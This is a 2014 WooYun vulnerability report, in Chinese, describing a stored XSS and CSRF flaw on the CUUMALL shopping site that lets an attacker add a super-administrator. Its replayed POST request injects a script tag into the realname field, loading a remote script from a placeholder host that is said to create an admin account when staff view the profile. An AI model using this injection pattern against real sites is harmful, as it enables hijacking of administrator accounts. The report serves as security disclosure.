漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-065039
漏洞标题:CUUMALL商场存储型xss+csrf添加超级管理员
相关厂商:cuumall.com
漏洞作者: menmen519
提交时间:2014-06-20 11:54
修复时间:2014-06-25 11:55
公开时间:2014-06-25 11:55
漏洞类型:xss跨站脚本攻击
危害等级:低
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-06-20: 细节已通知厂商并且等待厂商处理中
2014-06-25: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
CUUMALL 存储型xss+csrf添加超级管理员
详细说明:
注册用户后,然后在完善用户资料后,然后进行重新编辑如图所示:
这里我们抓一次包,然后重放post数据为:
shen=%E6%B9%96%E5%8C%97&shi=%E8%8D%86%E5%B7%9E%E5%B8%82&qu=%E6%B2%99%E5%B8%82%E5%8C%BA&uid=529&realname="><script src=http://xxx/xss_csrf_shell.js></script><sp&email=atest%40qq.com&more=sdasdada&youbian=712000&tel=2294568226&mob=15802996564&qq=3154678&ww=22365&imageField.x=80&imageField.y=25&__hash__=542651f0fd15535c418aaa9ebdc11646
如图所示:
xss_csrf_shell.js内容如下:
如上内容所示我们添加一个test4管理员,当管理员查看用户信息时候:
然后我们到管理员权限,下面的管理员列表可以看到:
ok!!!!!!!!!!!!!
漏洞证明:
修复方案:
版权声明:转载请注明来源 menmen519@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-06-25 11:55
厂商回复:
最新状态:
暂无